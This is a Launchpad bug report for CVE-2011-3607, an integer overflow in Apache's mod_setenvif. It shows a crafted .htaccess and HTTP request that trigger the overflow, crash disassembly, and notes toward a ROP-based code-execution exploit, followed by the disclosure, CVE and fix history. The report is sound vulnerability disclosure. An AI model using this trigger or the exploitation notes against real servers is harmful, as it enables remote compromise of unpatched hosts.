Bug #811422 “Exploitable integer overflow on x86 in mod SetEnvIf...” : Bugs : apache2 package : Ubuntu

Bug Description

Apache worker on oneric, in server/util.c, function

AP_DECLARE(char *) ap_pregsub(apr_pool_t *p, const char *input,
const char *source, size_t nmatch,
ap_regmatch_t pmatch[])

contains exploitable integer overflow when calculating length of
buffer:

        else if (no < nmatch && pmatch[no].rm_so < pmatch[no].rm_eo) {
            len += pmatch[no].rm_eo - pmatch[no].rm_so;
        }

...

dest = dst = apr_pcalloc(p, len + 1);

Can be triggered by placing .htaccess file on server with module
enabled:

SetEnvIf MyRequest "^(.*)$"
TestVar=$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$10123456789abcde
SetEnvIf TestVar "^(.*)$"
Test2Var=$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$10123456789abcdef0123456789abcdef0123456789abc
SetEnvIf Test2Var "^(.*)$"
Test3Var=$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1
SetEnvIf Test3Var "^(.*)$"
Test4Var=S$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1

Testrequest:

GET /test/file HTTP/1.1
Host: localhost
MyRequest: 0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF
Connection: close

Result: Allocates 2^6 * 2^6 * 2^6 * 2^6 * 2^8 + 1 = 2^32 + 1 bytes via
apr_pcalloc

Add some slack using "0123456789abcde" at end of expression to select if

        else if (no < nmatch && pmatch[no].rm_so < pmatch[no].rm_eo) {
            len = pmatch[no].rm_eo - pmatch[no].rm_so;
            memcpy(dst, source + pmatch[no].rm_so, len);
            dst += len;
        }

or while-loop around memcpy should segfault, usually at
        if (no > 9) { /* Ordinary character. */
            if (c == '\\' && (*src == '$' || *src == '&'))
                c = *src++;
            *dst++ = c;
        }

Ubuntu security was informed 20110715, no reply so far. When .htaccess was placed on server, exploitation seems to be possible on nonexec segments using 2 concurrent client requests over net. With return-oriented-programming with 3 blocks from (xchg eax/esp+ret; pop eax+ret, pop ebx,ecx,edx+ret; cd 0x80) should do the trick, but currently stability is not good enough. The main target to control IP is

0 0x002cb36b in apr_brigade_cleanup () from /usr/lib/libaprutil-2.so.0
esi 0x46464646 1179010629
   0x002cb350 <+0>: push %ebp
   0x002cb351 <+1>: push %edi
   0x002cb352 <+2>: push %esi
   0x002cb353 <+3>: sub $0x10,%esp
   0x002cb356 <+6>: mov 0x20(%esp),%edi
   0x002cb35a <+10>: mov 0x4(%edi),%eax
   0x002cb35d <+13>: lea 0x4(%edi),%ebp
   0x002cb360 <+16>: cmp %ebp,%eax
   0x002cb362 <+18>: je 0x2cb393 <apr_brigade_cleanup+67>
   0x002cb364 <+20>: lea 0x0(%esi,%eiz,1),%esi
   0x002cb368 <+24>: mov 0x4(%edi),%esi -- user controlable
=> 0x002cb36b <+27>: mov 0x4(%esi),%eax
   0x002cb36e <+30>: mov (%esi),%edx
   0x002cb370 <+32>: mov %edx,(%eax) -- (esi) to (esi+4)
   0x002cb372 <+34>: mov (%esi),%eax
   0x002cb374 <+36>: mov 0x4(%esi),%edx
   0x002cb377 <+39>: mov %edx,0x4(%eax) -- (esi+4) to ((esi)+4)
   0x002cb37a <+42>: mov 0x8(%esi),%eax
   0x002cb37d <+45>: mov 0x18(%esi),%edx -- 0x18 value to stack
   0x002cb380 <+48>: mov %edx,(%esp)
   0x002cb383 <+51>: call *0xc(%eax)

where esi is user controllable and can be made pointing to other user-data blocks. The symlink attack from
http://www.halfdog.net/Security/2011/ApacheNoFollowSymlinkTimerace/ (issue number coming soon) might be useful to get apache memory layout from /proc/<pid>/maps, a issue to suspend httpd when serving pipes (https://bugs.launchpad.net/ubuntu/+source/apache2/+bug/811417) might be helpful with timing attack, but this not yet proofed.

# lsb_release -rd
Description: Ubuntu oneiric (development branch)
Release: 11.10

# apt-cache policy apache2-mpm-worker
apache2-mpm-worker:
  Installed: 2.2.19-1ubuntu1
  Candidate: 2.2.19-1ubuntu1
  Version table:
*** 2.2.19-1ubuntu1 0
        500 http://archive.ubuntu.com/ubuntu/ oneiric/main i386 Packages
        100 /var/lib/dpkg/status

Add tags Tag help

Related branches

lp:ubuntu/hardy-security/apache2

lp:ubuntu/hardy-updates/apache2

lp:ubuntu/lucid-security/apache2

lp:ubuntu/lucid-updates/apache2

lp:ubuntu/maverick-security/apache2

lp:ubuntu/natty-security/apache2

lp:ubuntu/oneiric-security/apache2

CVE References

halfdog (halfdog) wrote on 2011-07-16:

Read proc/<pid>/maps due to timerace https://bugs.launchpad.net/ubuntu/+source/apache2/+bug/811428 . Since attacker must have been able to place .htaccess on server, he might be able to place a symlink also.

Marc Deslauriers (mdeslaur) wrote on 2011-08-01:

Thanks for reporting this issue.

Could you please report this issue to the Apache Security Team, and possibly link the resulting bug report here.

Thanks.

Changed in apache2 (Ubuntu):
importance:	Undecided → Low

Marc Deslauriers (mdeslaur) wrote on 2011-08-01:

See here for information on reporting this issue:
http://www.apache.org/security/

Jamie Strandboge (jdstrand) wrote on 2011-08-26:

What was the response from upstream?

Changed in apache2 (Ubuntu):
assignee:	nobody → Jamie Strandboge (jdstrand)
status:	New → Incomplete

halfdog (halfdog) wrote on 2011-10-04:

Sent mail to <email address hidden> 2011-07-15 (no reply) and again today:

Dear Apache Httpd Security Team,

It seems possible to execute arbitrary via the bug reported
2011-07-15. Since this requires a crafted .htaccess file on the host,
this might not be a too big issue.

See

http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/

for first draft of multi-thread exploit (url not published elsewhere).
Currently I'm trying to get more stable code executing using the
stop-regex approach and just a single thread.

I checked the reporting guidelines again today and found, that there is a different security contact mail address mentioned. I'm not sure, if something has changed at apache website or I just picked up an dead address. Resending to <email address hidden>

halfdog (halfdog) wrote on 2011-10-27:

Got reply from apache-security, request to create advisory.

Updated bug information, placed a advisory-stub at http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/ , sent update to apache.

halfdog (halfdog) wrote on 2011-11-04:

Information Joe Orton:

We'd prefer to discuss the appropriate fix for this on the public
mailing list, so could you publish your advisory as soon as is
convenient. We'll follow up with public discussion and patches as
appropriate.

Please use the CVE name CVE-2011-3607 for this issue.

Very good discussion:

http://www.gossamer-threads.com/lists/apache/dev/403775

visibility:

private → public

halfdog (halfdog) wrote on 2011-11-09:

CVE-2011-3607 is fixed upstream in trunk, but not yet released: http://svn.apache.org/viewvc?view=revision&revision=1198940

Another CVE-2011-4415 was assigned by mitre to the resource consumption, NULL-dereference issue

Marc Deslauriers (mdeslaur) on 2012-02-14

Changed in apache2 (Ubuntu Hardy):
status:	New → Confirmed
Changed in apache2 (Ubuntu Lucid):
status:	New → Confirmed
Changed in apache2 (Ubuntu Maverick):
status:	New → Confirmed
Changed in apache2 (Ubuntu Natty):
status:	New → Confirmed
Changed in apache2 (Ubuntu Oneiric):
status:	New → Confirmed
Changed in apache2 (Ubuntu Precise):
status:	Incomplete → Fix Released
assignee:	Jamie Strandboge (jdstrand) → nobody
Changed in apache2 (Ubuntu Hardy):
assignee:	nobody → Marc Deslauriers (mdeslaur)
Changed in apache2 (Ubuntu Lucid):
assignee:	nobody → Marc Deslauriers (mdeslaur)
Changed in apache2 (Ubuntu Maverick):
assignee:	nobody → Marc Deslauriers (mdeslaur)
Changed in apache2 (Ubuntu Oneiric):
assignee:	nobody → Marc Deslauriers (mdeslaur)
Changed in apache2 (Ubuntu Natty):
assignee:	nobody → Marc Deslauriers (mdeslaur)
Changed in apache2 (Ubuntu Hardy):
importance:	Undecided → Low
Changed in apache2 (Ubuntu Lucid):
importance:	Undecided → Low
Changed in apache2 (Ubuntu Maverick):
importance:	Undecided → Low
Changed in apache2 (Ubuntu Oneiric):
importance:	Undecided → Low
Changed in apache2 (Ubuntu Natty):
importance:	Undecided → Low